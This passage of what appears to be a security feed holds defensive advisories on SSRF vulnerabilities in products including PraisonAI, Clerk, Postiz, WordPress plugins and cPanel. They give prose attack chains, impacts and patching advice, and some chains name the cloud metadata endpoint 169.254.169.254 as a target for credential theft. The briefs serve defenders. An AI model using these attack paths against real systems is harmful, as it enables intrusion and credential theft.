<p>Successful exploitation of CVE-2026-33107 could lead to significant privilege escalation within an Azure Databricks environment. An attacker could potentially gain unauthorized access to sensitive data, modify critical system configurations, or even achieve complete control over the Databricks cluster. This could result in data breaches, service disruptions, and substantial financial losses. The exact number of potential victims and the scope of the impact would depend on the specific configurations and data stored within the targeted Azure Databricks environment. Given the critical nature of Databricks for data analytics, the impact on organizations relying on this service can be substantial.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the security update provided by Microsoft to patch CVE-2026-33107 immediately on all Azure Databricks instances.</li>
<li>Implement network segmentation to limit the impact of potential SSRF exploits.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Databricks Outbound Connections</code> to identify potential SSRF attempts.</li>
<li>Monitor webserver logs for unusual outbound connections originating from Azure Databricks servers.</li>
<li>Review and restrict access to internal resources within the Azure Databricks environment.</li>
<li>Implement strict input validation and sanitization on all user-supplied data to prevent SSRF attacks.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>ssrf</category><category>azure</category><category>databricks</category><category>privilege-escalation</category></item><item><title>Huimeicloud hm_editor Server-Side Request Forgery Vulnerability (CVE-2026-5346)</title><link>https://feed.craftedsignal.io/briefs/2026-04-huimeicloud-ssrf/</link><pubDate>Thu, 02 Apr 2026 15:16:53 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-huimeicloud-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in huimeicloud hm_editor up to version 2.2.3, allowing remote attackers to manipulate the 'url' argument in the client.get function of src/mcp-server.js to potentially access internal resources.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability has been identified in huimeicloud hm_editor, specifically affecting versions up to 2.2.3. The vulnerability resides within the <code>client.get</code> function in the <code>src/mcp-server.js</code> file, which is part of the image-to-base64 endpoint. By manipulating the <code>url</code> argument, a remote attacker can potentially force the server to make requests to unintended locations, including internal resources. This vulnerability, identified as CVE-2026-5346, has a CVSS v3.1 score of 7.3 and is remotely exploitable. Public exploits are available. The vendor was notified but has not responded.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an instance of huimeicloud hm_editor running version 2.2.3 or earlier.</li>
<li>The attacker crafts a malicious URL containing a payload designed to exploit the SSRF vulnerability in the image-to-base64 endpoint.</li>
<li>The attacker sends a request to the vulnerable endpoint (<code>src/mcp-server.js</code>) with the crafted <code>url</code> parameter.</li>
<li>The <code>client.get</code> function processes the attacker-controlled <code>url</code> argument without proper validation.</li>
<li>The server-side application initiates an HTTP request based on the manipulated URL, potentially targeting internal resources or external services.</li>
<li>The server receives the response from the targeted resource.</li>
<li>The server may process and return the data obtained from the targeted resource to the attacker or use it internally.</li>
<li>The attacker gains unauthorized access to internal information or leverages the server as a proxy for further attacks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-5346) can lead to unauthorized access to internal resources, sensitive data exposure, and the ability to use the vulnerable server as a proxy for further attacks. The impact includes potential compromise of internal systems, circumvention of security controls, and data breaches. The affected component is the <code>image-to-base64</code> endpoint, which may be used to process user-supplied images.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply input validation and sanitization to the <code>url</code> argument passed to the <code>client.get</code> function within the <code>src/mcp-server.js</code> file to prevent SSRF attacks, mitigating CVE-2026-5346.</li>
<li>Monitor web server logs for suspicious requests targeting the image-to-base64 endpoint (<code>src/mcp-server.js</code>) with unusual <code>url</code> parameters, using the provided Sigma rule to identify exploitation attempts.</li>
<li>Implement network segmentation to limit the impact of successful SSRF attacks by restricting access to internal resources from the vulnerable server.</li>
<li>Deploy the Sigma rule to detect attempts to exploit CVE-2026-5346, focusing on unusual URLs being passed to the <code>image-to-base64</code> endpoint.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cve-2026-5346</category><category>ssrf</category><category>huimeicloud</category></item><item><title>WordPress Webmention Plugin SSRF Vulnerability (CVE-2026-0686)</title><link>https://feed.craftedsignal.io/briefs/2026-04-wordpress-webmention-ssrf/</link><pubDate>Thu, 02 Apr 2026 08:16:27 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-wordpress-webmention-ssrf/</guid><description>The Webmention plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to 5.6.2, allowing unauthenticated attackers to make arbitrary web requests and potentially query or modify internal services.</description><content:encoded><![CDATA[<p>The Webmention plugin for WordPress, a plugin designed to facilitate webmention communications, contains a Server-Side Request Forgery (SSRF) vulnerability identified as CVE-2026-0686. This vulnerability affects all versions of the plugin up to and including 5.6.2. The vulnerability resides within the &lsquo;MF2::parse_authorpage&rsquo; function, accessible through the &lsquo;Receiver::post&rsquo; function. An unauthenticated attacker can exploit this flaw to force the WordPress server to make HTTP requests to arbitrary external or internal locations. This can be leveraged to gather sensitive information from internal services, bypass firewalls, or potentially modify data depending on the accessibility of internal resources. The vulnerable code was present as of April 2026 in the version 5.6.2 branch.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker crafts a malicious webmention request targeting a WordPress site running the vulnerable Webmention plugin.</li>
<li>The WordPress site receives the webmention request and processes it using the &lsquo;Receiver::post&rsquo; function.</li>
<li>The &lsquo;Receiver::post&rsquo; function calls the &lsquo;MF2::parse_authorpage&rsquo; function to parse the author page URL specified in the webmention request.</li>
<li>The &lsquo;MF2::parse_authorpage&rsquo; function, due to lack of proper validation, makes an HTTP request to an attacker-controlled or internal URL specified within the webmention data.</li>
<li>The WordPress server initiates a connection to the specified URL, potentially bypassing firewall restrictions or accessing internal services not directly exposed to the internet.</li>
<li>The response from the targeted URL is processed by the plugin, potentially revealing information about the internal network or services.</li>
<li>Depending on the targeted internal service and the attacker&rsquo;s crafted request, the attacker might be able to modify data or execute commands.</li>
<li>Successful exploitation leads to information disclosure, internal service compromise, or potential remote code execution depending on the vulnerable internal service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-0686 allows unauthenticated attackers to perform Server-Side Request Forgery attacks against WordPress sites utilizing the Webmention plugin. This can lead to the exposure of sensitive information from internal services, such as configuration files or database credentials. Furthermore, attackers could potentially leverage this vulnerability to interact with and potentially compromise other internal systems that are not directly accessible from the internet, leading to a full compromise of the affected network. While the exact number of affected WordPress installations is unknown, the widespread use of the Webmention plugin makes this a significant risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the Webmention plugin to a version higher than 5.6.2 to patch CVE-2026-0686.</li>
<li>Deploy the Sigma rule &ldquo;Detect Webmention SSRF Attempt via Request to Internal IP&rdquo; to identify exploitation attempts in web server logs.</li>
<li>Monitor web server logs for unusual outbound connections originating from the WordPress server to internal IP addresses.</li>
<li>Implement network segmentation to limit the impact of potential SSRF attacks, restricting access from the WordPress server to only necessary internal services.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>wordpress</category><category>webmention</category><category>cve-2026-0686</category></item><item><title>PraisonAI SSRF Vulnerability via Unvalidated api_base Parameter</title><link>https://feed.craftedsignal.io/briefs/2026-04-praisonai-ssrf/</link><pubDate>Wed, 01 Apr 2026 23:22:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-praisonai-ssrf/</guid><description>PraisonAI versions 4.5.89 and earlier are vulnerable to SSRF via the `api_base` parameter in the `passthrough()` function, allowing attackers to make requests to internal services or external hosts, potentially leading to IAM credential theft on cloud infrastructure or access to internal services within the VPC.</description><content:encoded><![CDATA[<p>PraisonAI versions 4.5.89 and earlier are vulnerable to a Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-34936) due to insufficient validation of the <code>api_base</code> parameter within the <code>passthrough()</code> function. This flaw allows an attacker to control the base URL used in HTTP requests, enabling them to target internal services, external hosts, or cloud metadata endpoints. The vulnerability arises because the <code>api_base</code> parameter is directly concatenated with the <code>endpoint</code> parameter and passed to <code>httpx.Client.request()</code> without any sanitization. This is triggered in the <code>passthrough()</code> function if the <code>litellm</code> primary path raises an <code>AttributeError</code>. This allows attackers to bypass intended access controls and potentially retrieve sensitive information or trigger unintended actions within the PraisonAI server&rsquo;s network. The vulnerability was reported on April 1, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a PraisonAI instance running a vulnerable version (&lt;= 4.5.89).</li>
<li>The attacker crafts a malicious request to the <code>passthrough()</code> function, providing a crafted <code>api_base</code> parameter.</li>
<li>The crafted <code>api_base</code> contains the address of an internal service (e.g., Redis, Elasticsearch, Kubernetes API) or the EC2 metadata service (<code>http://169.254.169.254</code>).</li>
<li>An <code>AttributeError</code> is triggered in the <code>litellm</code> primary path.</li>
<li>The <code>passthrough()</code> function, within <code>passthrough.py</code>, concatenates the attacker-controlled <code>api_base</code> with the specified <code>endpoint</code>.</li>
<li>The resulting URL is then passed to <code>httpx.Client.request()</code>, making an HTTP request to the attacker-specified destination.</li>
<li>If targeting the EC2 metadata service, the attacker can retrieve IAM credentials associated with the instance.</li>
<li>If targeting internal services, the attacker can potentially access sensitive data or perform unauthorized actions, due to the default <code>AUTH_ENABLED = False</code> setting.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can lead to serious consequences. On cloud infrastructure, attackers can steal IAM credentials from the EC2 metadata service (IMDSv1), potentially gaining control over the entire AWS account. Internal services within the VPC, such as Redis, Elasticsearch, and Kubernetes API, become accessible without authentication, as the Flask API server deploys with <code>AUTH_ENABLED = False</code> by default. This can lead to data breaches, service disruptions, or further lateral movement within the internal network. This vulnerability affects deployments of PraisonAI version 4.5.89 and earlier.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade PraisonAI to a version greater than 4.5.89 to patch CVE-2026-34936.</li>
<li>Implement input validation and sanitization on the <code>api_base</code> parameter within the <code>passthrough()</code> function to prevent SSRF attacks.</li>
<li>If running on AWS, disable IMDSv1 and migrate to IMDSv2 to mitigate the risk of IAM credential theft.</li>
<li>Implement network segmentation and access controls to restrict access to internal services from the PraisonAI server.</li>
<li>Deploy the following Sigma rule to detect attempts to exploit the SSRF vulnerability by monitoring for connections to the EC2 metadata service or the local loopback address.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>praisonai</category><category>cloud</category></item><item><title>Payload CMS SSRF Vulnerability (CVE-2026-34746)</title><link>https://feed.craftedsignal.io/briefs/2026-04-payload-cms-ssrf/</link><pubDate>Wed, 01 Apr 2026 20:16:26 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-payload-cms-ssrf/</guid><description>Payload CMS versions before 3.79.1 are vulnerable to Server-Side Request Forgery (SSRF) allowing authenticated users with upload access to trigger outbound HTTP requests to arbitrary URLs.</description><content:encoded><![CDATA[<p>Payload CMS, a free and open-source headless content management system, is susceptible to a Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-34746) in versions prior to 3.79.1. This flaw allows authenticated users with create or update permissions to upload-enabled collections to trigger the server to initiate outbound HTTP requests to arbitrary URLs. This vulnerability stems from insufficient validation of user-supplied URLs during the upload process. An attacker could potentially exploit this to scan internal networks, access internal services, or conduct other malicious activities. The vulnerability has been addressed in version 3.79.1 of Payload CMS.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker authenticates to the Payload CMS application with create or update access to an upload-enabled collection.</li>
<li>The attacker crafts a malicious request containing a URL intended for server-side processing via the upload functionality. This URL could point to an internal service, a file on the local system, or an external server controlled by the attacker.</li>
<li>The attacker submits the crafted request to the Payload CMS server through the upload mechanism.</li>
<li>The Payload CMS server, lacking adequate validation of the provided URL, processes the request.</li>
<li>The server initiates an HTTP request to the attacker-specified URL.</li>
<li>The server receives the response from the targeted URL.</li>
<li>The response is potentially processed or returned by the Payload CMS application depending on the specific implementation.</li>
<li>The attacker gains access to internal resources or services, or potentially uses the server as a proxy for further attacks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-34746) can allow an attacker to perform unauthorized actions such as internal port scanning, accessing sensitive data from internal services, or leveraging the compromised server as a proxy to conduct attacks against other systems. This could lead to data breaches, service disruption, or further compromise of the affected infrastructure. Although the precise number of installations affected is unknown, organizations using versions of Payload CMS prior to 3.79.1 are vulnerable.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Payload CMS to version 3.79.1 or later to patch the SSRF vulnerability (CVE-2026-34746).</li>
<li>Implement strict input validation on all user-supplied URLs, especially those used in upload functionality, to prevent SSRF attacks.</li>
<li>Monitor web server logs for unusual outbound HTTP requests originating from the Payload CMS server to detect potential SSRF exploitation. Deploy the Sigma rule detecting outbound connections from the webserver.</li>
<li>Implement network segmentation to limit the impact of a successful SSRF attack by restricting access to sensitive internal resources.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cve-2026-34746</category><category>ssrf</category><category>payload-cms</category></item><item><title>OpenClaw SSRF Vulnerability via Unguarded Configured Base URLs</title><link>https://feed.craftedsignal.io/briefs/2026-05-openclaw-ssrf/</link><pubDate>Sun, 29 Mar 2026 15:49:23 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-openclaw-ssrf/</guid><description>OpenClaw versions 2026.3.24 and earlier are vulnerable to Server-Side Request Forgery (SSRF) because of unguarded configured base URLs in multiple channel extensions, allowing attackers to potentially access internal resources.</description><content:encoded><![CDATA[<p>The <code>openclaw</code> package, a Node.js module, contains a Server-Side Request Forgery (SSRF) vulnerability in versions 2026.3.24 and earlier. This flaw stems from an incomplete fix for CVE-2026-28476, where several channel extensions continued to use raw <code>fetch()</code> against configured base URLs without proper SSRF protection. This omission allows attackers to potentially manipulate configured endpoints to target blocked internal destinations, bypassing intended security measures. The vulnerability was identified and patched in version 2026.3.25 through commit <code>f92c92515bd439a71bd03eb1bc969c1964f17acf</code>, which routes outbound requests through <code>fetchWithSsrFGuard</code>. Defenders should ensure they are running version 2026.3.25 or later.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies an <code>openclaw</code> instance running version 2026.3.24 or earlier.</li>
<li>The attacker identifies a channel extension that uses a configured base URL.</li>
<li>Attacker crafts a malicious configuration that redirects the base URL to an internal resource.</li>
<li>The vulnerable <code>fetch()</code> function in the channel extension makes an HTTP request to the attacker-controlled URL.</li>
<li>The request bypasses the SSRF guard due to the incomplete fix for CVE-2026-28476.</li>
<li>The targeted internal resource processes the attacker&rsquo;s request.</li>
<li>Sensitive information from the internal resource is potentially exposed to the attacker.</li>
<li>Attacker exfiltrates the exposed information, completing the SSRF attack.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability could allow an attacker to gain unauthorized access to internal resources and sensitive information. The number of potential victims is dependent on the prevalence of vulnerable <code>openclaw</code> instances. If successful, the attacker can read internal files, access internal services, or even potentially execute commands on internal systems, leading to data breaches or further compromise of the network.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the <code>openclaw</code> package to version 2026.3.25 or later to incorporate the fix for CVE-2026-28476, as described in the overview.</li>
<li>Implement network segmentation to limit the impact of potential SSRF vulnerabilities by restricting access from the affected systems to sensitive internal resources.</li>
<li>Deploy the Sigma rule &ldquo;Detect OpenClaw SSRF Vulnerable Versions&rdquo; to identify potentially vulnerable instances of the <code>openclaw</code> package based on user-agent strings.</li>
<li>Monitor outbound network connections from <code>openclaw</code> instances for connections to internal IP addresses or unexpected domains, which could indicate SSRF exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>openclaw</category><category>cve-2026-28476</category></item><item><title>elecV2 elecV2P Server-Side Request Forgery Vulnerability (CVE-2026-5016)</title><link>https://feed.craftedsignal.io/briefs/2026-03-elecv2-ssrf/</link><pubDate>Sat, 28 Mar 2026 22:15:58 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-elecv2-ssrf/</guid><description>A server-side request forgery vulnerability exists in elecV2 elecV2P up to 3.8.3, affecting the eAxios function within the /mock URL handler, allowing remote attackers to manipulate the req argument and potentially conduct internal reconnaissance or other malicious activities.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability, tracked as CVE-2026-5016, has been identified in elecV2 elecV2P versions up to 3.8.3. The vulnerability lies within the <code>eAxios</code> function of the <code>/mock</code> URL handler. By manipulating the <code>req</code> argument, a remote attacker can potentially force the server to make requests to arbitrary internal or external addresses. This could lead to the exposure of sensitive information, internal reconnaissance, or other malicious actions. The exploit is…</p>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cve-2026-5016</category><category>ssrf</category><category>elecv2</category><category>web-application</category></item><item><title>LibreChat SSRF Vulnerability (CVE-2026-31943)</title><link>https://feed.craftedsignal.io/briefs/2026-03-librechat-ssrf/</link><pubDate>Sat, 28 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-librechat-ssrf/</guid><description>LibreChat versions prior to 0.8.3 are vulnerable to Server-Side Request Forgery (SSRF), allowing authenticated users to bypass IP address validation and make the server issue HTTP requests to internal network resources.</description><content:encoded><![CDATA[<p>LibreChat, a ChatGPT clone, contains a Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-31943) in versions prior to 0.8.3. The <code>isPrivateIP()</code> function in <code>packages/api/src/auth/domain.ts</code> fails to properly detect IPv4-mapped IPv6 addresses when they are in their hex-normalized form. This flaw allows an authenticated user to bypass SSRF protection mechanisms and force the LibreChat server to make HTTP requests to internal network resources. These resources include cloud metadata…</p>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>librechat</category><category>cve-2026-31943</category></item><item><title>Clerk SSRF Vulnerability in frontendApiProxy Allows Secret Key Leakage</title><link>https://feed.craftedsignal.io/briefs/2026-03-clerk-ssrf/</link><pubDate>Sat, 28 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-clerk-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in the `clerkFrontendApiProxy` function of the `@clerk/backend` package, allowing an unauthenticated attacker to send the application's `Clerk-Secret-Key` to an attacker-controlled server.</description><content:encoded><![CDATA[<p>The <code>clerkFrontendApiProxy</code> function in <code>@clerk/backend</code> versions 3.0.0 through 3.2.2, <code>@clerk/express</code> versions 2.0.0 through 2.0.6, <code>@clerk/hono</code> versions 0.1.0 through 0.1.4, and <code>@clerk/fastify</code> versions 3.1.0 through 3.1.4 is susceptible to a Server-Side Request Forgery (SSRF) vulnerability. This flaw enables an unauthenticated attacker to craft malicious request paths that, when processed by the proxy, result in the application&rsquo;s <code>Clerk-Secret-Key</code> being transmitted to a server under the attacker&rsquo;s control. Only applications that have explicitly enabled the <code>frontendApiProxy</code> feature are affected. This feature is not enabled by default, limiting the scope of potential impact. Notably, <code>@clerk/nextjs</code> users are not affected due to the framework&rsquo;s handling of repeated slashes in request paths, which mitigates the vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies an application that has the <code>frontendApiProxy</code> feature enabled and is running a vulnerable version of <code>@clerk/backend</code>, <code>@clerk/express</code>, <code>@clerk/hono</code>, or <code>@clerk/fastify</code>.</li>
<li>The attacker crafts a malicious HTTP request targeting the proxy endpoint (<code>/__clerk/</code> by default). The request path includes double slashes or other path manipulation techniques to bypass intended routing logic.</li>
<li>The vulnerable <code>clerkFrontendApiProxy</code> function processes the crafted request without proper sanitization or validation of the request path.</li>
<li>Due to the SSRF vulnerability, the proxy makes an internal request to an unintended destination, potentially including an attacker-controlled server.</li>
<li>The application&rsquo;s <code>Clerk-Secret-Key</code> is inadvertently included in the headers or body of the internal request made by the proxy.</li>
<li>The attacker-controlled server receives the request containing the <code>Clerk-Secret-Key</code>.</li>
<li>The attacker extracts the <code>Clerk-Secret-Key</code> from the captured request.</li>
<li>With the compromised <code>Clerk-Secret-Key</code>, the attacker can impersonate the application, access protected resources, or perform other unauthorized actions within the Clerk ecosystem.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows an attacker to obtain the <code>Clerk-Secret-Key</code> of a vulnerable application. While internal logs from Clerk show no evidence of active exploitation, the potential impact of a compromised secret key is significant. An attacker with the key can impersonate the application, potentially leading to unauthorized access to user data, modification of application settings, or other malicious activities. The severity is further heightened because a successful attack can occur without authentication.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to the patched version of <code>@clerk/backend</code> (3.2.3), <code>@clerk/express</code> (2.0.7), <code>@clerk/hono</code> (0.1.5), or <code>@clerk/fastify</code> (3.1.5) immediately if you are using the <code>frontendApiProxy</code> feature.</li>
<li>Rotate your Clerk Secret Key in the <a href="https://dashboard.clerk.com">Clerk Dashboard</a> under <strong>API Keys</strong> after upgrading to mitigate potential compromise, as recommended by the advisory.</li>
<li>Audit access logs for requests to your proxy endpoint (<code>/__clerk/</code> by default) containing double slashes in the path to detect potential exploitation attempts.</li>
<li>Deploy the Sigma rule provided below to identify requests with double slashes to the Clerk proxy endpoint.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>vulnerability</category><category>clerk</category><category>cloud</category></item><item><title>Oxygen Theme WordPress Plugin Vulnerable to Server-Side Request Forgery (CVE-2025-12886)</title><link>https://feed.craftedsignal.io/briefs/2026-03-oxygen-theme-ssrf/</link><pubDate>Sat, 28 Mar 2026 04:16:49 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-oxygen-theme-ssrf/</guid><description>The Oxygen Theme for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to 6.0.8, allowing unauthenticated attackers to make arbitrary web requests via the laborator_calc_route AJAX action.</description><content:encoded>&lt;p>The Oxygen Theme WordPress plugin, versions 6.0.8 and earlier, contains a Server-Side Request Forgery (SSRF) vulnerability (CVE-2025-12886). This flaw allows unauthenticated attackers to send crafted requests to the WordPress server, potentially forcing it to make outbound connections to internal or external resources. The vulnerability is located within the &lt;code>laborator_calc_route&lt;/code> AJAX action. By exploiting this, attackers can potentially access sensitive internal resources, bypass firewall…&lt;/p>
</content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>wordpress</category><category>oxygen-theme</category><category>cve-2025-12886</category></item><item><title>LinkAce Server-Side Request Forgery Vulnerability (CVE-2026-33953)</title><link>https://feed.craftedsignal.io/briefs/2024-01-linkace-ssrf/</link><pubDate>Fri, 27 Mar 2026 22:16:21 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-linkace-ssrf/</guid><description>LinkAce versions prior to 2.5.3 are vulnerable to server-side request forgery (SSRF), allowing an authenticated user to trigger server-side requests to internal services by referencing internal hostnames.</description><content:encoded>&lt;p>LinkAce, a self-hosted archive for collecting website links, is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability in versions prior to 2.5.3. This flaw, identified as CVE-2026-33953, stems from the application&amp;rsquo;s insufficient validation of user-supplied hostnames. Although direct requests to private IP literals are blocked, the application still performs server-side requests to internal resources when referenced through an internal hostname. An authenticated user can exploit this…&lt;/p>
</content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>linkace</category><category>vulnerability</category></item><item><title>Postiz App SSRF Vulnerability via Next.js</title><link>https://feed.craftedsignal.io/briefs/2026-03-postiz-ssrf/</link><pubDate>Fri, 27 Mar 2026 15:46:53 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-postiz-ssrf/</guid><description>A high-severity SSRF vulnerability exists in the Postiz application via Next.js, allowing attackers to bypass firewalls, scan internal networks, access sensitive cloud metadata (AWS IMDS), potentially leak instance credentials, and pivot within the internal network.</description><content:encoded><![CDATA[<p>The Postiz application, a web application built with Next.js, is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability (CVE-2024-34351) allows an attacker to force the server to make HTTP requests to arbitrary domains. Exploitation can lead to internal network reconnaissance, access to sensitive cloud metadata, and potential credential theft. The vulnerability affects Postiz versions 2.0.12 and earlier. Users are advised to upgrade to version 2.21.1 to mitigate the risk. The primary concern is unauthorized access to internal resources and sensitive data through manipulated server-side requests.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable endpoint in the Postiz application that accepts a URL as input.</li>
<li>The attacker crafts a malicious URL pointing to an internal resource, such as <code>http://169.254.169.254/latest/meta-data/</code>.</li>
<li>The Postiz server, without proper validation, makes an HTTP request to the specified URL.</li>
<li>If successful, the server retrieves the requested data from the internal resource.</li>
<li>The server returns the retrieved data to the attacker in the HTTP response.</li>
<li>The attacker obtains sensitive information such as AWS instance metadata, including IAM roles and access keys.</li>
<li>The attacker uses the compromised credentials to pivot into other AWS resources or the internal network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful SSRF attack can have significant consequences. Attackers can bypass firewall restrictions to scan and interact with internal network services, potentially discovering sensitive information and exploiting further vulnerabilities. Accessing cloud metadata services like AWS IMDS allows for the theft of instance credentials, enabling attackers to compromise other AWS resources and escalate their privileges. This vulnerability can lead to a full compromise of the internal network environment where Postiz is hosted, potentially impacting all services and data within that environment.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Postiz to version v2.21.1 to patch the SSRF vulnerability as recommended by the vendor.</li>
<li>Deploy the Sigma rule &ldquo;Detect SSRF Attempt to AWS IMDS&rdquo; to identify attempts to access the AWS metadata service (169.254.169.254) via HTTP requests.</li>
<li>Monitor web server logs for unusual outbound HTTP requests to internal IP addresses and private networks, specifically those originating from the Postiz application.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>vulnerability</category><category>cloud</category></item><item><title>mingSoft MCMS Server-Side Request Forgery Vulnerability (CVE-2026-4953)</title><link>https://feed.craftedsignal.io/briefs/2026-03-mingsoft-ssrf/</link><pubDate>Fri, 27 Mar 2026 15:17:02 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-mingsoft-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability (CVE-2026-4953) exists in mingSoft MCMS version 5.5.0, allowing remote attackers to manipulate the 'catchimage' argument in the catchImage function to potentially access or interact with internal resources.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability has been identified in mingSoft MCMS version 5.5.0. The vulnerability resides within the <code>catchImage</code> function in the <code>net/mingsoft/cms/action/BaseAction.java</code> file, specifically affecting the Editor Endpoint component. Attackers can remotely exploit this vulnerability by manipulating the <code>catchimage</code> argument. Publicly available exploits exist, increasing the risk of exploitation. Successful exploitation could allow an attacker to probe…</p>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>SSRF</category><category>mingSoft</category><category>CVE-2026-4953</category></item><item><title>Spring AI BedrockProxyChatModel SSRF Vulnerability (CVE-2026-22742)</title><link>https://feed.craftedsignal.io/briefs/2026-03-spring-ai-ssrf/</link><pubDate>Fri, 27 Mar 2026 06:16:37 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-spring-ai-ssrf/</guid><description>Spring AI's spring-ai-bedrock-converse library is vulnerable to Server-Side Request Forgery (SSRF) due to insufficient validation of user-supplied media URLs in multimodal messages, allowing attackers to trigger HTTP requests to internal or external destinations.</description><content:encoded>&lt;p>A Server-Side Request Forgery (SSRF) vulnerability has been identified in the spring-ai-bedrock-converse library within Spring AI. The vulnerability resides in the BedrockProxyChatModel component and arises during the processing of multimodal messages. Specifically, when handling user-supplied media URLs, the application fails to adequately validate these URLs. This lack of validation allows a malicious actor to inject arbitrary URLs, potentially causing the server to make unintended HTTP…&lt;/p>
</content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>spring-ai</category><category>bedrockproxychatmodel</category><category>cve-2026-22742</category></item><item><title>Multiple Vulnerabilities in cPanel/WHM</title><link>https://feed.craftedsignal.io/briefs/2026-03-cpanel-vulns/</link><pubDate>Tue, 24 Mar 2026 12:11:04 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-cpanel-vulns/</guid><description>An anonymous remote attacker can exploit multiple vulnerabilities in cPanel/WHM to bypass security measures, perform XSS and SSRF attacks, disclose information, and potentially execute code.</description><content:encoded><![CDATA[<p>Multiple vulnerabilities have been identified in cPanel/WHM, a widely used web hosting control panel. An anonymous, remote attacker can exploit these vulnerabilities to compromise cPanel/WHM installations. The vulnerabilities allow an attacker to bypass security measures, perform Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) attacks, disclose sensitive information, and potentially execute arbitrary code on the server. These vulnerabilities pose a significant risk to organizations relying on cPanel/WHM for web hosting, potentially leading to data breaches, service disruption, and unauthorized access to sensitive systems.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable cPanel/WHM instance exposed to the internet.</li>
